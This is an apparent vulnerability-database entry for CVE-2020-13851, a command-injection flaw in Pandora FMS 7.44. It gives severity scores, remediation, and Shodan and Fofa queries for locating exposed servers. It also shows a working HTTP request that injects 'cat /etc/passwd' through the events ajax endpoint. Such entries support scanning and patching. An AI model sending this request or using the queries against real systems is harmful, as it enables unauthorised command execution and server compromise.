🔙 목록으로 돌아가기

CVE-2020-13851: Artica Pandora FMS 7.44 - Remote Code Execution

TitleArtica Pandora FMS 7.44 - Remote Code Execution
Authortheamanrawat
SeverityHigh
ImpactUnauthenticated attackers can execute arbitrary system commands via the events feature, leading to complete server compromise and access to all monitoring data.
RemediationUpgrade to Pandora FMS version 7.45 or later, or apply vendor-provided security patches.
CVSS Score8.8
EPSS Score0.93877
CVE IDCVE-2020-13851
CWE IDCWE-78
Shodan Querytitle:"Pandora FMS"http.title:"pandora fms"
Fofa Querytitle="pandora fms"
Tags cve2020 cve packetstorm rce pandora unauth artica pandorafms vuln

🔍 Vulnerability Description

Artica Pandora FMS 7.44 allows remote command execution via the events feature.

🌐 HTTP Request

POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

0

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-13851.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-13851.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A